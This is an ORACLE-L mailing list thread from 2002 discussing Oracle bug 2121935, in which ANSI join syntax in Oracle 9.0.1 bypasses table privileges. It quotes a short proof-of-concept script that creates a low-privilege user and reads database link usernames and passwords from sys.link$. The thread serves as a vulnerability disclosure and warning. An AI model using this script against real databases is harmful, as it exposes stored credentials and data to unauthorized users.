Oracle 9 only. Oracle 8 does not support ANSI join syntax.
Jonathan Lewis http://www.jlcomp.demon.co.uk Author of: Practical Oracle 8i: Building Efficient Databases Next Seminar - Australia - July/August http://www.jlcomp.demon.co.uk/seminar.html Host to The Co-Operative Oracle Users' FAQ http://www.jlcomp.demon.co.uk/faq/ind_faq.html -----Original Message----- To: Multiple recipients of list ORACLE-L <[EMAIL PROTECTED]> Date: 16 April 2002 13:47 |Is this on 9i databases or is 8 involved? Ruth |----- Original Message ----- |To: "Multiple recipients of list ORACLE-L" <[EMAIL PROTECTED]> |Sent: Tuesday, April 16, 2002 7:33 AM | | |> This just in from comp.databases.oracle.server. |> |> See metalink bug 2121935. |> |> Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) |> allows you to view data from tables on which you have no |> privilege. For example, try this COMPLETE script: |> |> connect / as sysdba |> create user us1 identified by us1; |> grant create session to us1; |> |> connect us1/us1 |> |> select userid, password |> from |> sys.link$ cross join dual |> ; |> |> |> |> Worse still, if you have the privilege to create views |> then this loophole allows you to seek and destroy |> ANY DATA in the database that you might want to. |> |> The bug is fixed in 9iR2. I didn't see any note |> about a backport, or a security alert on OTN. |> |> Conclusion: |> |> 9.0.1 should not be in use on production system |> until Oracle supplies a fix. |> -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Jonathan Lewis INET: [EMAIL PROTECTED] Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
